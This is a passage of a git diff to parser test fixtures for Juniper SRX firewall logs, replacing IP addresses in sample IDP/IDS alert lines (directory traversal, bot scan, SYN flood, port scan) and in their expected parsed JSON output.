RT_IDP - IDP_APPDDOS_APP_ATTACK_EVENT [junos@2636.1.1.1.2.35 epoch-time="1319419711" ddos-application-name="Webserver" source-zone-name="trust" source-interface-name="reth1.O" source-address="192.168.14.214" source-port="50825" destination-zone-name="untrust" destination-interface-name="reth0.0" destination-address="172.27.14.203" destination-port="80" protocol-name="TCP" service-name="HTTP" rule-name="1" ruleebase-name="DDOS" policy-name="AppDoS-Webserver" repeat-count="0" action="NONE" threat-severity="INFO" connection-hit-rate="30" context-name="http-get-url" context-hit-rate="123" context-value-hit-rate="0" time-scope="PEER" time-count="3" time-period="60" context-value="N/A"] -<165>1 2012-10-23T17:28:31.696 SRX34001 RT_IDP - IDP_APPDDOS_APP_ATTACK_EVENT_LS [junos@2636.1.1.1.2.35 epoch-time="1419419711" ddos-application-name="Webserver" source-zone-name="trust" source-interface-name="reth3.0" source-address="193.168.14.214" source-port="50825" destination-zone-name="untrust" destination-interface-name="reth0.1" destination-address="172.30.20.201" destination-port="80" protocol-name="TCP" service-name="HTTP" rule-name="1" ruleebase-name="DDOS02" policy-name="AppDoS-Webserver" repeat-count="0" action="NONE" threat-severity="INFO" connection-hit-rate="30" context-name="http-get-url" context-hit-rate="123" context-value-hit-rate="0" time-scope="PEER" time-count="3" time-period="60" context-value="N/A"] +<165>1 2020-03-02T23:13:03.193Z idp1 RT_IDP - IDP_ATTACK_LOG_EVENT [junos@67.43.156.15 epoch-time="1583190783" message-type="SIG" source-address="10.11.11.1" source-port="12345" destination-address="67.43.156.14" destination-port="123" protocol-name="TCP" service-name="SERVICE_IDP" application-name="HTTP" rule-name="3" rulebase-name="IPS" policy-name="Recommended" export-id="20175" repeat-count="0" action="DROP" threat-severity="HIGH" attack-name="HTTP:MISC:GENERIC-DIR-TRAVERSAL" nat-source-address="0.0.0.0" nat-source-port="13312" nat-destination-address="67.43.156.15" nat-destination-port="9757" elapsed-time="0" inbound-bytes="0" outbound-bytes="0" inbound-packets="0" outbound-packets="0" source-zone-name="UNTRUST" source-interface-name="reth1.24" destination-zone-name="DMZ" destination-interface-name="reth2.21" packet-log-id="0" alert="no" username="unknown-user" roles="N/A" index="cnm" type="idp" message="-"] +<165>1 2020-03-02T23:13:03.197Z idp1 RT_IDP - IDP_ATTACK_LOG_EVENT [junos@67.43.156.15 epoch-time="1583190783" message-type="SIG" source-address="10.11.11.1" source-port="12345" destination-address="67.43.156.14" destination-port="123" protocol-name="TCP" service-name="SERVICE_IDP" application-name="HTTP" rule-name="3" rulebase-name="IPS" policy-name="Recommended" export-id="20175" repeat-count="0" action="DROP" threat-severity="CRITICAL" attack-name="TCP:C2S:AMBIG:C2S-SYN-DATA" nat-source-address="0.0.0.0" nat-source-port="13312" nat-destination-address="67.43.156.15" nat-destination-port="9757" elapsed-time="0" inbound-bytes="0" outbound-bytes="0" inbound-packets="0" outbound-packets="0" source-zone-name="UNTRUST" source-interface-name="reth1.24" destination-zone-name="DMZ" destination-interface-name="reth2.21" packet-log-id="0" alert="no" username="unknown-user" roles="N/A" index="cnm" type="idp" message="-"] +<165>1 2007-02-15T09:17:15.719Z idp1 RT_IDP - IDP_ATTACK_LOG_EVENT [junos@67.43.156.15 epoch-time="1507845354" message-type="SIG" source-address="67.43.156.14" source-port="45610" destination-address="67.43.156.14" destination-port="80" protocol-name="TCP" service-name="SERVICE_IDP" application-name="HTTP" rule-name="9" rulebase-name="IPS" policy-name="Recommended" export-id="15229" repeat-count="0" action="DROP" threat-severity="HIGH" attack-name="TROJAN:ZMEU-BOT-SCAN" nat-source-address="0.0.0.0" nat-source-port="0" nat-destination-address="172.19.13.11" nat-destination-port="0" elapsed-time="0" inbound-bytes="0" outbound-bytes="0" inbound-packets="0" outbound-packets="0" source-zone-name="sec-zone-name-internet" source-interface-name="reth0.11" destination-zone-name="dst-sec-zone1-outside" destination-interface-name="reth1.1" packet-log-id="0" alert="no" username="N/A" roles="N/A" message="-"] +<165>1 2017-10-13T08:55:55.792+11:00 idp1 RT_IDP - IDP_ATTACK_LOG_EVENT [junos@67.43.156.15 epoch-time="1507845354" message-type="SIG" source-address="67.43.156.14" source-port="45610" destination-address="67.43.156.14" destination-port="80" protocol-name="TCP" service-name="SERVICE_IDP" application-name="HTTP" rule-name="9" rulebase-name="IPS" policy-name="Recommended" export-id="15229" repeat-count="0" action="DROP" threat-severity="HIGH" attack-name="TROJAN:ZMEU-BOT-SCAN" nat-source-address="0.0.0.0" nat-source-port="0" nat-destination-address="172.16.1.10" nat-destination-port="0" elapsed-time="0" inbound-bytes="0" outbound-bytes="0" inbound-packets="0" outbound-packets="0" source-zone-name="sec-zone-name-internet" source-interface-name="reth0.11" destination-zone-name="dst-sec-zone1-outside" destination-interface-name="reth1.1" packet-log-id="0" alert="no" username="N/A" roles="N/A" message="-"] +<165>1 2011-10-23T02:06:26.544 SRX34001 RT_IDP - IDP_APPDDOS_APP_STATE_EVENT [junos@67.43.156.15 epoch-time="1319367986" ddos-application-name="Webserver" destination-zone-name="untrust" destination-interface-name="reth0.0" destination-address="172.27.14.203" destination-port="80" protocol-name="TCP" service-name="HTTP" rule-name="1" rulebase-name="DDOS" policy-name="A DoS-Webserver" repeat-count="0" message="Connection rate exceeded limit 60" context-value="N/A"] +<165>1 2011-10-23T16:28:31.696 SRX34001 RT_IDP - IDP_APPDDOS_APP_ATTACK_EVENT [junos@67.43.156.15 epoch-time="1319419711" ddos-application-name="Webserver" source-zone-name="trust" source-interface-name="reth1.O" source-address="192.168.14.214" source-port="50825" destination-zone-name="untrust" destination-interface-name="reth0.0" destination-address="172.27.14.203" destination-port="80" protocol-name="TCP" service-name="HTTP" rule-name="1" ruleebase-name="DDOS" policy-name="AppDoS-Webserver" repeat-count="0" action="NONE" threat-severity="INFO" connection-hit-rate="30" context-name="http-get-url" context-hit-rate="123" context-value-hit-rate="0" time-scope="PEER" time-count="3" time-period="60" context-value="N/A"] +<165>1 2012-10-23T17:28:31.696 SRX34001 RT_IDP - IDP_APPDDOS_APP_ATTACK_EVENT_LS [junos@67.43.156.15 epoch-time="1419419711" ddos-application-name="Webserver" source-zone-name="trust" source-interface-name="reth3.0" source-address="192.168.14.214" source-port="50825" destination-zone-name="untrust" destination-interface-name="reth0.1" destination-address="172.30.20.201" destination-port="80" protocol-name="TCP" service-name="HTTP" rule-name="1" ruleebase-name="DDOS02" policy-name="AppDoS-Webserver" repeat-count="0" action="NONE" threat-severity="INFO" connection-hit-rate="30" context-name="http-get-url" context-hit-rate="123" context-value-hit-rate="0" time-scope="PEER" time-count="3" time-period="60" context-value="N/A"] diff --git a/packages/juniper/data_stream/srx/_dev/test/pipeline/test-idp.log-expected.json b/packages/juniper/data_stream/srx/_dev/test/pipeline/test-idp.log-expected.json index f7fc1553c1b..2d9eb57de25 100644 --- a/packages/juniper/data_stream/srx/_dev/test/pipeline/test-idp.log-expected.json +++ b/packages/juniper/data_stream/srx/_dev/test/pipeline/test-idp.log-expected.json @@ -8,7 +8,7 @@ "port": 123, "bytes": 0, "packets": 0, - "ip": "187.188.188.10" + "ip": "67.43.156.14" }, "log": { "level": "notification" @@ -16,12 +16,12 @@ "destination": { "nat": { "port": 9757, - "ip": "3.3.10.11" + "ip": "67.43.156.15" }, "port": 123, "bytes": 0, "packets": 0, - "ip": "187.188.188.10" + "ip": "67.43.156.14" }, "rule": { "name": "IPS", @@ -94,9 +94,9 @@ ], "ip": [ "10.11.11.1", - "187.188.188.10", + "67.43.156.14", "0.0.0.0", - "3.3.10.11" + "67.43.156.15" ] }, "client": { @@ -111,8 +111,8 @@ "event": { "duration": 0, "severity": 165, - "ingested": "2021-12-06T12:25:29.196345082Z", - "original": "\u003c165\u003e1 2020-03-02T23:13:03.193Z idp1 RT_IDP - IDP_ATTACK_LOG_EVENT [junos@2636.1.1.1.2.28 epoch-time=\"1583190783\" message-type=\"SIG\" source-address=\"10.11.11.1\" source-port=\"12345\" destination-address=\"187.188.188.10\" destination-port=\"123\" protocol-name=\"TCP\" service-name=\"SERVICE_IDP\" application-name=\"HTTP\" rule-name=\"3\" rulebase-name=\"IPS\" policy-name=\"Recommended\" export-id=\"20175\" repeat-count=\"0\" action=\"DROP\" threat-severity=\"HIGH\" attack-name=\"HTTP:MISC:GENERIC-DIR-TRAVERSAL\" nat-source-address=\"0.0.0.0\" nat-source-port=\"13312\" nat-destination-address=\"3.3.10.11\" nat-destination-port=\"9757\" elapsed-time=\"0\" inbound-bytes=\"0\" outbound-bytes=\"0\" inbound-packets=\"0\" outbound-packets=\"0\" source-zone-name=\"UNTRUST\" source-interface-name=\"reth1.24\" destination-zone-name=\"DMZ\" destination-interface-name=\"reth2.21\" packet-log-id=\"0\" alert=\"no\" username=\"unknown-user\" roles=\"N/A\" index=\"cnm\" type=\"idp\" message=\"-\"]", + "ingested": "2021-12-09T13:40:03.197201400Z", + "original": "\u003c165\u003e1 2020-03-02T23:13:03.193Z idp1 RT_IDP - IDP_ATTACK_LOG_EVENT [junos@67.43.156.15 epoch-time=\"1583190783\" message-type=\"SIG\" source-address=\"10.11.11.1\" source-port=\"12345\" destination-address=\"67.43.156.14\" destination-port=\"123\" protocol-name=\"TCP\" service-name=\"SERVICE_IDP\" application-name=\"HTTP\" rule-name=\"3\" rulebase-name=\"IPS\" policy-name=\"Recommended\" export-id=\"20175\" repeat-count=\"0\" action=\"DROP\" threat-severity=\"HIGH\" attack-name=\"HTTP:MISC:GENERIC-DIR-TRAVERSAL\" nat-source-address=\"0.0.0.0\" nat-source-port=\"13312\" nat-destination-address=\"67.43.156.15\" nat-destination-port=\"9757\" elapsed-time=\"0\" inbound-bytes=\"0\" outbound-bytes=\"0\" inbound-packets=\"0\" outbound-packets=\"0\" source-zone-name=\"UNTRUST\" source-interface-name=\"reth1.24\" destination-zone-name=\"DMZ\" destination-interface-name=\"reth2.21\" packet-log-id=\"0\" alert=\"no\" username=\"unknown-user\" roles=\"N/A\" index=\"cnm\" type=\"idp\" message=\"-\"]", "kind": "alert", "start": "2020-03-02T23:13:03.193Z", "action": "security_threat", @@ -137,7 +137,7 @@ "port": 123, "bytes": 0, "packets": 0, - "ip": "187.188.188.10" + "ip": "67.43.156.14" }, "log": { "level": "notification" @@ -145,12 +145,12 @@ "destination": { "nat": { "port": 9757, - "ip": "3.3.10.11" + "ip": "67.43.156.15" }, "port": 123, "bytes": 0, "packets": 0, - "ip": "187.188.188.10" + "ip": "67.43.156.14" }, "rule": { "name": "IPS", @@ -223,9 +223,9 @@ ], "ip": [ "10.11.11.1", - "187.188.188.10", + "67.43.156.14", "0.0.0.0", - "3.3.10.11" + "67.43.156.15" ] }, "client": { @@ -240,8 +240,8 @@ "event": { "duration": 0, "severity": 165, - "ingested": "2021-12-06T12:25:29.196353078Z", - "original": "\u003c165\u003e1 2020-03-02T23:13:03.197Z idp1 RT_IDP - IDP_ATTACK_LOG_EVENT [junos@2636.1.1.1.2.28 epoch-time=\"1583190783\" message-type=\"SIG\" source-address=\"10.11.11.1\" source-port=\"12345\" destination-address=\"187.188.188.10\" destination-port=\"123\" protocol-name=\"TCP\" service-name=\"SERVICE_IDP\" application-name=\"HTTP\" rule-name=\"3\" rulebase-name=\"IPS\" policy-name=\"Recommended\" export-id=\"20175\" repeat-count=\"0\" action=\"DROP\" threat-severity=\"CRITICAL\" attack-name=\"TCP:C2S:AMBIG:C2S-SYN-DATA\" nat-source-address=\"0.0.0.0\" nat-source-port=\"13312\" nat-destination-address=\"3.3.10.11\" nat-destination-port=\"9757\" elapsed-time=\"0\" inbound-bytes=\"0\" outbound-bytes=\"0\" inbound-packets=\"0\" outbound-packets=\"0\" source-zone-name=\"UNTRUST\" source-interface-name=\"reth1.24\" destination-zone-name=\"DMZ\" destination-interface-name=\"reth2.21\" packet-log-id=\"0\" alert=\"no\" username=\"unknown-user\" roles=\"N/A\" index=\"cnm\" type=\"idp\" message=\"-\"]", + "ingested": "2021-12-09T13:40:03.197210Z", + "original": "\u003c165\u003e1 2020-03-02T23:13:03.197Z idp1 RT_IDP - IDP_ATTACK_LOG_EVENT [junos@67.43.156.15 epoch-time=\"1583190783\" message-type=\"SIG\" source-address=\"10.11.11.1\" source-port=\"12345\" destination-address=\"67.43.156.14\" destination-port=\"123\" protocol-name=\"TCP\" service-name=\"SERVICE_IDP\" application-name=\"HTTP\" rule-name=\"3\" rulebase-name=\"IPS\" policy-name=\"Recommended\" export-id=\"20175\" repeat-count=\"0\" action=\"DROP\" threat-severity=\"CRITICAL\" attack-name=\"TCP:C2S:AMBIG:C2S-SYN-DATA\" nat-source-address=\"0.0.0.0\" nat-source-port=\"13312\" nat-destination-address=\"67.43.156.15\" nat-destination-port=\"9757\" elapsed-time=\"0\" inbound-bytes=\"0\" outbound-bytes=\"0\" inbound-packets=\"0\" outbound-packets=\"0\" source-zone-name=\"UNTRUST\" source-interface-name=\"reth1.24\" destination-zone-name=\"DMZ\" destination-interface-name=\"reth2.21\" packet-log-id=\"0\" alert=\"no\" username=\"unknown-user\" roles=\"N/A\" index=\"cnm\" type=\"idp\" message=\"-\"]", "kind": "alert", "start": "2020-03-02T23:13:03.197Z", "action": "security_threat", @@ -266,7 +266,7 @@ "port": 80, "bytes": 0, "packets": 0, - "ip": "118.127.111.1" + "ip": "67.43.156.14" }, "log": { "level": "notification" @@ -279,7 +279,7 @@ "port": 80, "bytes": 0, "packets": 0, - "ip": "118.127.111.1" + "ip": "67.43.156.14" }, "rule": { "name": "IPS", @@ -293,7 +293,7 @@ "port": 45610, "bytes": 0, "packets": 0, - "ip": "183.78.180.27" + "ip": "67.43.156.14" }, "juniper": { "srx": { @@ -343,8 +343,7 @@ }, "related": { "ip": [ - "183.78.180.27", - "118.127.111.1", + "67.43.156.14", "0.0.0.0", "172.19.13.11" ] @@ -356,13 +355,13 @@ "port": 45610, "bytes": 0, "packets": 0, - "ip": "183.78.180.27" + "ip": "67.43.156.14" }, "event": { "duration": 0, "severity": 165, - "ingested": "2021-12-06T12:25:29.196355011Z", - "original": "\u003c165\u003e1 2007-02-15T09:17:15.719Z idp1 RT_IDP - IDP_ATTACK_LOG_EVENT [junos@2636.1.1.1.2.135 epoch-time=\"1507845354\" message-type=\"SIG\" source-address=\"183.78.180.27\" source-port=\"45610\" destination-address=\"118.127.111.1\" destination-port=\"80\" protocol-name=\"TCP\" service-name=\"SERVICE_IDP\" application-name=\"HTTP\" rule-name=\"9\" rulebase-name=\"IPS\" policy-name=\"Recommended\" export-id=\"15229\" repeat-count=\"0\" action=\"DROP\" threat-severity=\"HIGH\" attack-name=\"TROJAN:ZMEU-BOT-SCAN\" nat-source-address=\"0.0.0.0\" nat-source-port=\"0\" nat-destination-address=\"172.19.13.11\" nat-destination-port=\"0\" elapsed-time=\"0\" inbound-bytes=\"0\" outbound-bytes=\"0\" inbound-packets=\"0\" outbound-packets=\"0\" source-zone-name=\"sec-zone-name-internet\" source-interface-name=\"reth0.11\" destination-zone-name=\"dst-sec-zone1-outside\" destination-interface-name=\"reth1.1\" packet-log-id=\"0\" alert=\"no\" username=\"N/A\" roles=\"N/A\" message=\"-\"]", + "ingested": "2021-12-09T13:40:03.197213600Z", + "original": "\u003c165\u003e1 2007-02-15T09:17:15.719Z idp1 RT_IDP - IDP_ATTACK_LOG_EVENT [junos@67.43.156.15 epoch-time=\"1507845354\" message-type=\"SIG\" source-address=\"67.43.156.14\" source-port=\"45610\" destination-address=\"67.43.156.14\" destination-port=\"80\" protocol-name=\"TCP\" service-name=\"SERVICE_IDP\" application-name=\"HTTP\" rule-name=\"9\" rulebase-name=\"IPS\" policy-name=\"Recommended\" export-id=\"15229\" repeat-count=\"0\" action=\"DROP\" threat-severity=\"HIGH\" attack-name=\"TROJAN:ZMEU-BOT-SCAN\" nat-source-address=\"0.0.0.0\" nat-source-port=\"0\" nat-destination-address=\"172.19.13.11\" nat-destination-port=\"0\" elapsed-time=\"0\" inbound-bytes=\"0\" outbound-bytes=\"0\" inbound-packets=\"0\" outbound-packets=\"0\" source-zone-name=\"sec-zone-name-internet\" source-interface-name=\"reth0.11\" destination-zone-name=\"dst-sec-zone1-outside\" destination-interface-name=\"reth1.1\" packet-log-id=\"0\" alert=\"no\" username=\"N/A\" roles=\"N/A\" message=\"-\"]", "kind": "alert", "start": "2007-02-15T09:17:15.719Z", "action": "security_threat", @@ -387,7 +386,7 @@ "port": 80, "bytes": 0, "packets": 0, - "ip": "118.127.30.11" + "ip": "67.43.156.14" }, "log": { "level": "notification" @@ -400,7 +399,7 @@ "port": 80, "bytes": 0, "packets": 0, - "ip": "118.127.30.11" + "ip": "67.43.156.14" }, "rule": { "name": "IPS", @@ -414,7 +413,7 @@ "port": 45610, "bytes": 0, "packets": 0, - "ip": "183.78.180.27" + "ip": "67.43.156.14" }, "juniper": { "srx": { @@ -464,8 +463,7 @@ }, "related": { "ip": [ - "183.78.180.27", - "118.127.30.11", + "67.43.156.14", "0.0.0.0", "172.16.1.10" ] @@ -477,13 +475,13 @@ "port": 45610, "bytes": 0, "packets": 0, - "ip": "183.78.180.27" + "ip": "67.43.156.14" }, "event": { "duration": 0, "severity": 165, - "ingested": "2021-12-06T12:25:29.196356484Z", - "original": "\u003c165\u003e1 2017-10-13T08:55:55.792+11:00 idp1 RT_IDP - IDP_ATTACK_LOG_EVENT [junos@2636.1.1.1.2.135 epoch-time=\"1507845354\" message-type=\"SIG\" source-address=\"183.78.180.27\" source-port=\"45610\" destination-address=\"118.127.30.11\" destination-port=\"80\" protocol-name=\"TCP\" service-name=\"SERVICE_IDP\" application-name=\"HTTP\" rule-name=\"9\" rulebase-name=\"IPS\" policy-name=\"Recommended\" export-id=\"15229\" repeat-count=\"0\" action=\"DROP\" threat-severity=\"HIGH\" attack-name=\"TROJAN:ZMEU-BOT-SCAN\" nat-source-address=\"0.0.0.0\" nat-source-port=\"0\" nat-destination-address=\"172.16.1.10\" nat-destination-port=\"0\" elapsed-time=\"0\" inbound-bytes=\"0\" outbound-bytes=\"0\" inbound-packets=\"0\" outbound-packets=\"0\" source-zone-name=\"sec-zone-name-internet\" source-interface-name=\"reth0.11\" destination-zone-name=\"dst-sec-zone1-outside\" destination-interface-name=\"reth1.1\" packet-log-id=\"0\" alert=\"no\" username=\"N/A\" roles=\"N/A\" message=\"-\"]", + "ingested": "2021-12-09T13:40:03.197218Z", + "original": "\u003c165\u003e1 2017-10-13T08:55:55.792+11:00 idp1 RT_IDP - IDP_ATTACK_LOG_EVENT [junos@67.43.156.15 epoch-time=\"1507845354\" message-type=\"SIG\" source-address=\"67.43.156.14\" source-port=\"45610\" destination-address=\"67.43.156.14\" destination-port=\"80\" protocol-name=\"TCP\" service-name=\"SERVICE_IDP\" application-name=\"HTTP\" rule-name=\"9\" rulebase-name=\"IPS\" policy-name=\"Recommended\" export-id=\"15229\" repeat-count=\"0\" action=\"DROP\" threat-severity=\"HIGH\" attack-name=\"TROJAN:ZMEU-BOT-SCAN\" nat-source-address=\"0.0.0.0\" nat-source-port=\"0\" nat-destination-address=\"172.16.1.10\" nat-destination-port=\"0\" elapsed-time=\"0\" inbound-bytes=\"0\" outbound-bytes=\"0\" inbound-packets=\"0\" outbound-packets=\"0\" source-zone-name=\"sec-zone-name-internet\" source-interface-name=\"reth0.11\" destination-zone-name=\"dst-sec-zone1-outside\" destination-interface-name=\"reth1.1\" packet-log-id=\"0\" alert=\"no\" username=\"N/A\" roles=\"N/A\" message=\"-\"]", "kind": "alert", "start": "2017-10-12T21:55:55.792Z", "action": "security_threat", @@ -557,8 +555,8 @@ }, "event": { "severity": 165, - "ingested": "2021-12-06T12:25:29.196357997Z", - "original": "\u003c165\u003e1 2011-10-23T02:06:26.544 SRX34001 RT_IDP - IDP_APPDDOS_APP_STATE_EVENT [junos@2636.1.1.1.2.35 epoch-time=\"1319367986\" ddos-application-name=\"Webserver\" destination-zone-name=\"untrust\" destination-interface-name=\"reth0.0\" destination-address=\"172.27.14.203\" destination-port=\"80\" protocol-name=\"TCP\" service-name=\"HTTP\" rule-name=\"1\" rulebase-name=\"DDOS\" policy-name=\"A DoS-Webserver\" repeat-count=\"0\" message=\"Connection rate exceeded limit 60\" context-value=\"N/A\"]", + "ingested": "2021-12-09T13:40:03.197223300Z", + "original": "\u003c165\u003e1 2011-10-23T02:06:26.544 SRX34001 RT_IDP - IDP_APPDDOS_APP_STATE_EVENT [junos@67.43.156.15 epoch-time=\"1319367986\" ddos-application-name=\"Webserver\" destination-zone-name=\"untrust\" destination-interface-name=\"reth0.0\" destination-address=\"172.27.14.203\" destination-port=\"80\" protocol-name=\"TCP\" service-name=\"HTTP\" rule-name=\"1\" rulebase-name=\"DDOS\" policy-name=\"A DoS-Webserver\" repeat-count=\"0\" message=\"Connection rate exceeded limit 60\" context-value=\"N/A\"]", "kind": "alert", "action": "application_ddos", "category": [ @@ -653,8 +651,8 @@ }, "event": { "severity": 165, - "ingested": "2021-12-06T12:25:29.196359720Z", - "original": "\u003c165\u003e1 2011-10-23T16:28:31.696 SRX34001 RT_IDP - IDP_APPDDOS_APP_ATTACK_EVENT [junos@2636.1.1.1.2.35 epoch-time=\"1319419711\" ddos-application-name=\"Webserver\" source-zone-name=\"trust\" source-interface-name=\"reth1.O\" source-address=\"192.168.14.214\" source-port=\"50825\" destination-zone-name=\"untrust\" destination-interface-name=\"reth0.0\" destination-address=\"172.27.14.203\" destination-port=\"80\" protocol-name=\"TCP\" service-name=\"HTTP\" rule-name=\"1\" ruleebase-name=\"DDOS\" policy-name=\"AppDoS-Webserver\" repeat-count=\"0\" action=\"NONE\" threat-severity=\"INFO\" connection-hit-rate=\"30\" context-name=\"http-get-url\" context-hit-rate=\"123\" context-value-hit-rate=\"0\" time-scope=\"PEER\" time-count=\"3\" time-period=\"60\" context-value=\"N/A\"]", + "ingested": "2021-12-09T13:40:03.197228800Z", + "original": "\u003c165\u003e1 2011-10-23T16:28:31.696 SRX34001 RT_IDP - IDP_APPDDOS_APP_ATTACK_EVENT [junos@67.43.156.15 epoch-time=\"1319419711\" ddos-application-name=\"Webserver\" source-zone-name=\"trust\" source-interface-name=\"reth1.O\" source-address=\"192.168.14.214\" source-port=\"50825\" destination-zone-name=\"untrust\" destination-interface-name=\"reth0.0\" destination-address=\"172.27.14.203\" destination-port=\"80\" protocol-name=\"TCP\" service-name=\"HTTP\" rule-name=\"1\" ruleebase-name=\"DDOS\" policy-name=\"AppDoS-Webserver\" repeat-count=\"0\" action=\"NONE\" threat-severity=\"INFO\" connection-hit-rate=\"30\" context-name=\"http-get-url\" context-hit-rate=\"123\" context-value-hit-rate=\"0\" time-scope=\"PEER\" time-count=\"3\" time-period=\"60\" context-value=\"N/A\"]", "kind": "alert", "action": "application_ddos", "category": [ @@ -686,7 +684,7 @@ }, "source": { "port": 50825, - "ip": "193.168.14.214" + "ip": "192.168.14.214" }, "juniper": { "srx": { @@ -739,18 +737,18 @@ }, "related": { "ip": [ - "193.168.14.214", + "192.168.14.214", "172.30.20.201" ] }, "client": { "port": 50825, - "ip": "193.168.14.214" + "ip": "192.168.14.214" }, "event": { "severity": 165, - "ingested": "2021-12-06T12:25:29.196361283Z", - "original": "\u003c165\u003e1 2012-10-23T17:28:31.696 SRX34001 RT_IDP - IDP_APPDDOS_APP_ATTACK_EVENT_LS [junos@2636.1.1.1.2.35 epoch-time=\"1419419711\" ddos-application-name=\"Webserver\" source-zone-name=\"trust\" source-interface-name=\"reth3.0\" source-address=\"193.168.14.214\" source-port=\"50825\" destination-zone-name=\"untrust\" destination-interface-name=\"reth0.1\" destination-address=\"172.30.20.201\" destination-port=\"80\" protocol-name=\"TCP\" service-name=\"HTTP\" rule-name=\"1\" ruleebase-name=\"DDOS02\" policy-name=\"AppDoS-Webserver\" repeat-count=\"0\" action=\"NONE\" threat-severity=\"INFO\" connection-hit-rate=\"30\" context-name=\"http-get-url\" context-hit-rate=\"123\" context-value-hit-rate=\"0\" time-scope=\"PEER\" time-count=\"3\" time-period=\"60\" context-value=\"N/A\"]", + "ingested": "2021-12-09T13:40:03.197234200Z", + "original": "\u003c165\u003e1 2012-10-23T17:28:31.696 SRX34001 RT_IDP - IDP_APPDDOS_APP_ATTACK_EVENT_LS [junos@67.43.156.15 epoch-time=\"1419419711\" ddos-application-name=\"Webserver\" source-zone-name=\"trust\" source-interface-name=\"reth3.0\" source-address=\"192.168.14.214\" source-port=\"50825\" destination-zone-name=\"untrust\" destination-interface-name=\"reth0.1\" destination-address=\"172.30.20.201\" destination-port=\"80\" protocol-name=\"TCP\" service-name=\"HTTP\" rule-name=\"1\" ruleebase-name=\"DDOS02\" policy-name=\"AppDoS-Webserver\" repeat-count=\"0\" action=\"NONE\" threat-severity=\"INFO\" connection-hit-rate=\"30\" context-name=\"http-get-url\" context-hit-rate=\"123\" context-value-hit-rate=\"0\" time-scope=\"PEER\" time-count=\"3\" time-period=\"60\" context-value=\"N/A\"]", "kind": "alert", "action": "application_ddos", "category": [ diff --git a/packages/juniper/data_stream/srx/_dev/test/pipeline/test-ids.log b/packages/juniper/data_stream/srx/_dev/test/pipeline/test-ids.log index 249f2db45ab..bd7fa05b7cc 100644 --- a/packages/juniper/data_stream/srx/_dev/test/pipeline/test-ids.log +++ b/packages/juniper/data_stream/srx/_dev/test/pipeline/test-ids.log @@ -1,12 +1,12 @@ -<11>1 2018-07-19T18:17:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@2636.81.2.69.143.137 attack-name="TCP sweep!" source-address="81.2.69.145" source-port="6000" destination-address="81.2.69.193" destination-port="1433" source-zone-name="untrust" interface-name="fe-0/0/2.0" action="drop"] -<11>1 2018-07-19T18:18:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@2636.81.2.69.143.36 attack-name="WinNuke attack!" source-address="2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" source-port="3240" destination-address="2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" destination-port="139" source-zone-name="untrust" interface-name="fe-0/0/2.0" action="drop"] -<11>1 2018-07-19T18:19:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@2636.81.2.69.143.40 attack-name="SYN flood!" source-address="81.2.69.143" source-port="40001" destination-address="81.2.69.143" destination-port="50010" source-zone-name="trustZone" interface-name="ge-0/0/1.0" action="drop"] -<11>1 2018-07-19T18:22:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_UDP [junos@2636.81.2.69.143.40 attack-name="UDP flood!" source-address="81.2.69.193" source-port="40001" destination-address="81.2.69.143" destination-port="53" source-zone-name="trustZone" interface-name="ge-0/0/1.0" action="drop"] -<11>1 2018-07-19T18:25:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_ICMP [junos@2636.81.2.69.143.40 attack-name="ICMP fragment!" source-address="81.2.69.193" destination-address="81.2.69.143" source-zone-name="trustZone" interface-name="ge-0/0/1.0" action="drop"] -<11>1 2018-07-19T18:26:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_IP [junos@2636.81.2.69.143.40 attack-name="Record Route IP option!" source-address="81.2.69.193" destination-address="81.2.69.143" protocol-id="1" source-zone-name="trustZone" interface-name="ge-0/0/1.0" action="drop"] -<11>1 2018-07-19T18:27:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_IP [junos@2636.81.2.69.143.40 attack-name="Tunnel GRE 6in6!" source-address="2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" destination-address="2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" protocol-id="1" source-zone-name="trustZone" interface-name="ge-0/0/1.0" action="drop"] -<11>1 2018-07-19T18:28:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_IP [junos@2636.81.2.69.143.40 attack-name="Tunnel GRE 4in4!" source-address="81.2.69.193" destination-address="81.2.69.193" protocol-id="1" source-zone-name="trustZone" interface-name="ge-0/0/1.0" action="drop"] -<11>1 2018-07-19T19:19:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP_DST_IP [junos@2636.81.2.69.143.40 attack-name="SYN flood!" destination-address="81.2.69.143" source-zone-name="trustZone" interface-name="ge-0/0/1.0" action="alarm-without-drop"] -<11>1 2018-07-19T19:19:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP_SRC_IP [junos@2636.81.2.69.143.40 attack-name="SYN flood!" source-address="81.2.69.193" source-zone-name="trustZone" interface-name="ge-0/0/1.0" action="alarm-without-drop"] -<11>1 2020-07-17T09:54:43.912+02:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@2636.81.2.69.143.129 attack-name="TCP port scan!" source-address="216.160.83.61" source-port="50630" destination-address="81.2.69.193" destination-port="10778" source-zone-name="trust" interface-name="ge-0/0/1.0" action="drop"] -<11>1 2020-07-17T10:01:43.006+02:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@2636.81.2.69.143.129 attack-name="FIN but no ACK bit!" source-address="216.160.83.61" source-port="42799" destination-address="81.2.69.193" destination-port="7" source-zone-name="trust" interface-name="ge-0/0/1.0" action="drop"] +<11>1 2018-07-19T18:17:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@67.43.156.15 attack-name="TCP sweep!" source-address="67.43.156.13" source-port="6000" destination-address="67.43.156.14" destination-port="1433" source-zone-name="untrust" interface-name="fe-0/0/2.0" action="drop"] +<11>1 2018-07-19T18:18:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@67.43.156.15 attack-name="WinNuke attack!" source-address="2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" source-port="3240" destination-address="2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" destination-port="139" source-zone-name="untrust" interface-name="fe-0/0/2.0" action="drop"] +<11>1 2018-07-19T18:19:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP 